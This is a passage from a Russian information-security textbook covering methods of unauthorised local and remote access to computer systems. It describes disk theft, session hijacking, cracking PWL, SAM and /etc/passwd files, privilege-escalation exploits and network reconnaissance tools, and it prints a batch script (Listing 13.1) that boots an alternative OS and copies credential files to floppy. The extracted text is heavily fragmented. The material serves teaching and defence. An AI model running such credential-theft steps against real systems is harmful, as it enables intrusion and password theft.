Методы и средства защиты информации. Внимание!!! В книге могут встречаться существенные ошибки (в рисунках и формулах). Они не связаны ни со

Локальный
доступ
231
нием
Хищение информации
, ее носителей
, отдельных компонентов
АС
и
, учи
- тывая современные тенденции к
миниатюризации
СВТ
, целых
АС
было и
оста
- ется одним из самых распространенных способов несанкционированного полу
- чения информации
При этом квалификация лиц
, участвующих в
хищении может быть самой низкой
, а
правоохранительные органы
, расследующие такие факты
, да и
зачастую сами подвергшиеся хищению организации
, как правило
, сосредо
- тачивают основное внимание на осязаемых материальных ценностях
К
хище
- нию можно отнести и
такие действия злоумышленников
, когда компоненты
АС
просто подменяются на аналогичные
Например
, сначала специалист высокой квалификации оказавшись под каким
- то предлогом в
офисе организации и
ис
- пользуя благоприятную ситуацию
, может за считанные секунды выяснить мо
- дель жесткого диска
, причем все его действия будет контролировать легальный пользователь
(
типичная ситуация
— любезное предложение помощи неопытно
- му сотруднику
, у
которого
“
завис
” компьютер и
т п
.).
Затем злоумышленникам ос
- тается лишь найти вышедший из строя жесткий диск аналогичной модели и
, тай
- но проникнув в
офис
, заменить интересующий их жесткий диск неисправным
Если в
организации не ведется строгого учета компонентов
АС
по серийным но
- мерам
(
что
, к
сожалению
, встречается сплошь и
рядом
), а
злоумышленникам удастся скрыть факт проникновения в
помещение
(
что также не очень большая проблема для опытных взломщиков
), то такое происшествие не вызовет никако
- го подозрения
Кроме того
, к
хищениям во многих случаях можно отнести прямое копирова
- ние всего жесткого диска на другой диск
Даже если исходный диск защищен
, например
, с
помощью шифрования
, злоумышленник средней квалификации мо
- жет принести с
собой другой жесткий диск большего объема и
просто скопиро
- вать все содержимое исходного диска на свой диск
, который впоследствии будет передан на исследование специалистам более высокой квалификации
В
таком случае получение несанкционированного доступа к
скопированной информации
— всего лишь вопрос времени
Наконец
, следует знать
, что часто хищение информации маскируется под хищение материальных ценностей
Например
, злоумышленники могут похитить все офисное оборудование
, хотя на самом деле их интересует лишь содержи
- мое жесткого диска компьютера
, стоявшего в
кабинете руководителя
Часто ока
- зывается
, что руководители организаций
, требуя от подчиненных соблюдения всех правил информационной безопасности
, не распространяют на себя эти требования
, хотя имеют доступ к
любым файлам своих подчиненных
Например
, большинство руководителей даже не подозревают
, что все открываемые ими по сети файлы таких программ
, как
Microsoft Word и
других офисных приложений
, копируются в
папку для временных файлов
Windows на локальном диске
Вторым распространенным методом несанкционированного получения ин
- формации при локальном доступе к
АС
является использование
открытого
сеанса
легального
пользователя
Здесь возможности злоумышленника оп
-

232
Глава
13.
Методы
и
средства
несанкционированного
получения
...
ределяются лишь временем
, на который он получает доступ к
АС
, полномочия
- ми в
АС
легального пользователя и
наличием
(
точнее
, отсутствием
) контроля со стороны легального пользователя или его коллег
Особая опасность этого мето
- да заключается в
том
, что со стороны специалистов по защите информации дей
- ствия злоумышленника
, воспользовавшегося открытым сеансом легального пользователя
, скорее всего
, не вызовут никаких подозрений
(
в большинстве слу
- чаев на
“
своих
” пользователей
, особенно если они занимают в
иерархии органи
- зации более высокое положение
, администраторы безопасности обращают меньше всего внимания
).
Часто пользователи практически подталкивают посто
- ронних к
несанкционированному доступу к
своим системам
, размещая свои па
- роли
“
под рукой
” прямо на рабочем месте
(
например
, наклеивая листки для за
- писей с
паролями на монитор или на тыльную сторону клавиатуры
).
В
этом слу
- чае такая
“
защищенная
” система ничем не отличается от системы
, на которой остался открытым сеанс легального пользователя
Близким к
указанному выше методу является
подбор
пароля
легального
пользователя
Этот метод более
“
заметен
” со стороны компонентов
АС
, обес
- печивающих безопасность
, однако также оказывается достаточно эффективным
Например
, в
организации может быть реализована жесткая политика по выбору паролей
, обеспечивающая невозможность случайного подбора или угадывания паролей за
2–3 попытки с
блокированием учетной записи при превышении коли
- чества попыток
При этом все пользователи организации
, покидая рабочее ме
- сто
, должны временно блокировать доступ к
своим системам так
, чтобы блоки
- ровка снималась только при правильно введенном пароле
Однако некоторые пользователи могут установить полюбившиеся программы
- заставки
, в
которых ввод пароля происходит в
обход основной операционной системы
Часто оказы
- вается
, что такие пользователя в
качестве пароля выбирают последовательно
- сти вида
1111
или user и
т п
., что значительно облегчает задачу подбора паро
- ля легального пользователя
Часто для осуществления подбора пароля легального пользователя зло
- умышленники прибегают к
использованию открытого сеанса этого же или друго
- го пользователя с
последующим копированием системных файлов
В
частности
, в
системах
Windows 98/ME злоумышленник может скопировать файлы с
расши
- рением
PWL
, находящиеся в
основной папке
Windows, а
затем применить к
ним какое
- нибудь средство вскрытия файлов
PWL
, например
Repwl или
CAIN.
В
сис
- темах
Windows NT/2000/XP с
той же целью злоумышленник может скопировать файл
SAM
или его резервную копию
SAM._
, находящиеся в
папке repair сис
- темной папки
Windows, а
затем попытаться установить хранящиеся в
них пароли с
помощью системы
L0phtCrack.
В
Unix- подобных системах наибольший интерес для злоумышленника представляют файлы
/etc/passwd или shadow
С
помо
- щью таких утилит
, как crack или john
, любой злоумышленник
, обладая мини
- мальной квалификацией
, может за считанные минуты или даже секунды полу
-

Локальный
доступ
233
чить информацию о
паролях легальных пользователей
, хранящихся в
этих фай
- лах
Еще одним методом локального несанкционированного доступа является
ис
-
пользование
учетной
записи
легального
пользователя
для
расширения
полномочий
в
АС
Он отличается от метода использования открытого сеанса легального пользователя тем
, что в
данном случае злоумышленнику не требует
- ся выдавать себя за другого
, поскольку он в
силу тех или иных причин сам имеет доступ к
АС
Например
, во многих организациях сторонним пользователям
, по
- сетителям
, представителям других организаций
, временным сотрудникам и
дру
- гим лицам
, не являющимся сотрудниками организации
, предоставляют так на
- зываемые гостевые учетные записи
Однако часто оказывается
, что
АС
, предна
- значенные для гостевого доступа
, имеют физический доступ ко всем
АС
организации
, а
действия сторонних пользователей
, получающих гостевой дос
- туп
, практически никак не контролируются
Это позволяет злоумышленнику
, вос
- пользовавшись специальными
программами
взлома
(exploit), расширить свои полномочия вплоть до получения полного доступа ко всем
АС
организации
В
системах
Windows NT/2000/XP, например
, злоумышленник может воспользо
- ваться такими программами взлома
, как getadmin или main
, а
в
Unix- подобных системах
— многочисленными программами взлома командной оболочки и
дру
- гих
Unix- программ
, в
изобилии присутствующих в
Internet, действие которых ос
- новано на известных изъянах соответствующего системного программного обес
- печения
Unix.
Наконец
, часто злоумышленнику
, имеющему локальный доступ к
АС
, не нуж
- но вообще обладать квалификацией даже среднего уровня
, чтобы получить не
- санкционированный доступ к
информации этой
АС
Во многих случаях ему дос
- таточно прибегнуть к
такому простому приему
, как
загрузка
альтернативной
операционной
системы
Такая система может загружаться как с
дискеты
, так и
с компакт
- диска
. (
К
особой разновидности этого метода является срабатывание функции автозапуска в
Windows 98.
Воспользовавшись этим изъяном
, злоумыш
- ленник может запустить нужную ему программу даже на системе c Windows 98, защищенной с
помощью экранной заставки с
паролем
).
Например
, с
помощью простого командного файла
, приведенного в
листинге
13.1, злоумышленник мо
- жет в
считанные минуты перезагрузить компьютер
, работающий под управлени
- ем
Windows 98/ME/2000/XP и
получить в
свое распоряжение перечень всех фай
- лов
, а
также файлы
PWL
и
SAM
, хранящиеся на дисках этого компьютера
Листинг
13.1.
Пример командного файла для загрузки альтернативной операционной системы
@ECHO OFF mode con codepage prepare=((866) ega3.cpi) mode con codepage select=866 keyb ru,,keybrd3.sys

234
Глава
13.
Методы
и
средства
несанкционированного
получения
...
set EXPAND=YES
SET DIRCMD=/O:N set LglDrv=27 * 26 Z 25 Y 24 X 23 W 22 V 21 U 20 T set LglDrv=%LglDrv% 19 S 18 R 17 Q 16 P 15 O 14 N set LglDrv=%LglDrv% 13 M 12 L 11 K 10 J 9 I 8 H 7 G set LglDrv=%LglDrv% 6 F 5 E 4 D 3 C call setramd.bat %LglDrv% set temp=c:\ set tmp=c:\ path=%RAMD%:\;a:\;a:\vc copy command.com %RAMD%:\ >nul set comspec=%RAMD%:\command.com >nul md %RAMD%:\vc >nul
%RAMD%: copy a:\vc\*.* %RAMD%:\vc >nul copy a:\arj.exe %RAMD%:\ >nul copy a:\files.arj %RAMD%:\ >nul copy a:\files.a01 %RAMD%:\ >nul arj.exe e files.arj >nul arj.exe e files.a01 -y >nul
A:\smartdrv.exe >nul del files.a* >nul md %RAMD%:\sec >nul cd sec >nul md disks >nul cd disks >nul ldir c: /s > c.txt ldir d: /s > d.txt
Окончание
листинга
13.1 cd \ ntfspro.exe >nul cd sec\disks dir c: /s >> c.txt dir d: /s >> d.txt cd.. md c md d

Удаленный
доступ
235
copy /b c:\winnt\system32\config\sam %RAMD%:\sec\c >nul copy /b d:\winnt\system32\config\sam %RAMD%:\sec\d >nul copy /b c:\windows\system32\config\sam %RAMD%:\sec\c >nul copy /b d:\windows\system32\config\sam %RAMD%:\sec\d >nul copy /b c:\windows\*.pwl %RAMD%:\sec\c >nul copy /b d:\windows\*.pwl %RAMD%:\sec\d >nul cd \ arj.exe a -r -v1200 dirs.arj %RAMD%:\sec -y >nul copy %RAMD%:\dirs.arj a:\ copy %RAMD%:\dirs.a01 a:\
Удаленный
доступ
В
отличие от локального доступа
, палитра методов и
средств несанкциониро
- ванного получения информации из
АС
при удаленном доступе значительно ши
- ре и
достаточно сильно зависит от используемой операционной системы
(
ОС
), настройки параметров безопасности и
т п
Как ни парадоксально
, но наиболее защищенными
(
с некоторыми оговорками
) при удаленном доступе являются
АС
, работающие под управлением операционных систем
, которые наибольше всего уязвимы при локальном доступе
, например
Windows 98.
Однако это противоре
- чие только кажущееся
Действительно
, системы типа
MS DOS или
Windows 98 изначально не проектировались для работы в
сетях
Поэтому в
них практически отсутствуют развитые средства удаленного доступа
, а
имеющиеся средства представляют собой внешние по отношению к
ядру таких систем модули
, слабо интегрированные с
остальными компонентами подобных простейших
ОС
По
- этому
, если пользователь
АС
, работающей под управлением такой
ОС
, как
Windows 98, соблюдает простейшие правила безопасности
(
например
, не пре
- доставляет доступ по сети к
файлам и
папкам своего компьютера
), его система обладает высокой степенью устойчивости ко взлому
С
другой стороны
, большинство
Unix- подобных операционных систем изна
- чально проектировались и
развивались именно как сетевые операционные сис
- темы
Поэтому такие системы часто для обеспечения безопасной работы в
сетях требуют тщательной настройки параметров безопасности
Следует заметить
, что за редким исключением
(
например
, таким
, как
ОС
OpenBSD), большинство современных
ОС
при настройке параметров
, принятых по умолчанию
, являются
небезопасными
с точки зрения работы в
компьютер
- ных сетях
Поскольку полное описание методов и
средств несанкционированного полу
- чения информации из
АС
при удаленном доступе может занять объем
, значи
- тельно превышающий объем данной книги
, мы лишь вкратце рассмотрим основ
- ные из них
, используя для этого схему удаленного проникновения в
АС
, которой пользуется большинство злоумышленников
(
рис
. 13.2).

236
Глава
13.
Методы
и
средства
несанкционированного
получения
...
Рис
. 13.2.
Типовая схема несанкционированного получения информации из
АС
при удаленном доступе
Сбор
информации
На этапе сбора информации злоумышленник определяет пул
IP- адресов
АС
организации
, доступных из сети общего пользования
Строго говоря
, этапы сбо
- ра информации
, сканирования
, идентификации доступных ресурсов и
, в
какой
- то мере
, получения доступа могут предприниматься не злоумышленниками
, а
обычными пользователями
(
хотя
, конечно
, трудно назвать
“
обычным
” пользова
- теля
, который сканирует все открытые порты
АС
, чтобы всего
- навсего отправить сообщение электронной почты
).
Только совокупность этих операций с
соблюде
- нием некоторых условий
(
например
, массированное неоднократное сканирование всего пула
IP- адресов организации с
попытками установления соединений на все открытые порты
) может говорить о
предпринимающихся попытках несанкциониро
- ванного получения информации
Каждая же из указанных операций сама по себе не является чем
- то из ряда вон выходящим
Именно поэтому в
комплект поставки многих современных се
- тевых
ОС
входят инструментальные средства
, призванные обеспечить выпол
- нение соответствующих задач
, в
частности
, сбора информации
К
таким средствам относятся стандартные утилиты
Unix whois
, traceroute
(
в
Windows — tracert
), nslookup
, host
, и
их аналоги
, портированные в
другие
ОС
, а
также другие подобные средства
, обладающие более дружественным ин
- терфейсом
(Web- ориентированные варианты whois
, VisualRoute, Sam Spade и
т п
.).
С
помощью таких вполне безобидных средств можно выяснить
:
•
тип сетевого подключения организации
(
единичный компьютер
, сеть класса
C, сеть класса
B);
•
имена и
адреса серверов доменных имен
(DNS — Domain Name System), обеспечивающих трансляцию символьных имен в
IP- адреса по запросам
АС
организации
;

Удаленный
доступ
237
•
сеть
, в
которой установлены подключенные к
Internet
АС
организации
(
сеть провайдера
, прямое подключение и
т п
.);
•
схему подключения маршрутизаторов и
брандмауэров
;
•
реальные имена
, телефоны и
адреса электронной почты администратора подключения
;
•
схему распределения
IP- адресов внутри сети организации и
имена отдель
- ных узлов
(
с помощью так называемого переноса зоны с
помощью утилиты nslookup
).
Если сеть организации достаточно обширна и
в ней имеется множество ком
- пьютеров
, подключенных к
Internet, тщательно проведенный сбор информации может дать много других интересных для злоумышленника сведений
Чем тща
- тельнее проведен предварительный сбор информации
, тем выше вероятность успешного проникновения в
АС
интересующей злоумышленника организации
Сканирование
Составив предварительную схему сети и
наметив предварительный перечень наиболее уязвимых ее узлов
, злоумышленник
, как правило
, переходит к
скани
- рованию
Сканирование позволяет выявить реально работающие
АС
исследуе
- мой организации
, доступные по
Internet, определить тип и
версию
ОС
, под управлением которых они работают
, а
также получить перечни портов
TCP и
UDP, открытых на выявленных
АС
Для проведения сканирования в
распоряжении злоумышленника имеется широ
- кий спектр инструментальных средств
, начиная от простейшей утилиты ping
, вхо
- дящей в
комплект поставки всех современных
ОС
, и
заканчивая специализирован
- ными хакерскими инструментами
, такими
, как fping
, Pinger, icmpenum
, nmap
, strobe
, netcat
, NetScantTools Pro 2000, SuperScan, NTOScanner, WinScan, ipeye
,
Windows UDP Port Scanner, Cheops и
множеством других
Вооружившись этими или подобными инструментами
, злоумышленник может уточнить составленную на предыдущем этапе схему сети и
выбрать
АС
, на кото
- рые следует обратить внимание в
первую
, вторую и
т д
очереди
Идентификация
доступных
ресурсов
Очертив круг
АС
организации
, которые представляют собой для злоумыш
- ленника наибольший интерес
, он переходит к
следующему этапу
— идентифи
- кации доступных ресурсов
В
большинстве современных сетевых
ОС
для реше
- ния подобных задач имеется целый ряд инструментальных средств
, таких
, на
- пример
, как команды net
, nbtstat и
nbtscan в
Windows NT/2000/XP и
telnet
, finger
, rwho
, rusers
, rpcinfo и
rpcdump в
Unix.
Кроме того
, злоумышленнику могут пригодиться такие утилиты
, как nltest
, rmtshare
, srvcheck
, srvinfo и
snmputil
(Windows NT/2000/XP Resource Toolkit), а
также хакерские утилиты
DumpSec, Legion, NAT, enum
, user2sid
, sid2user и
netcat

238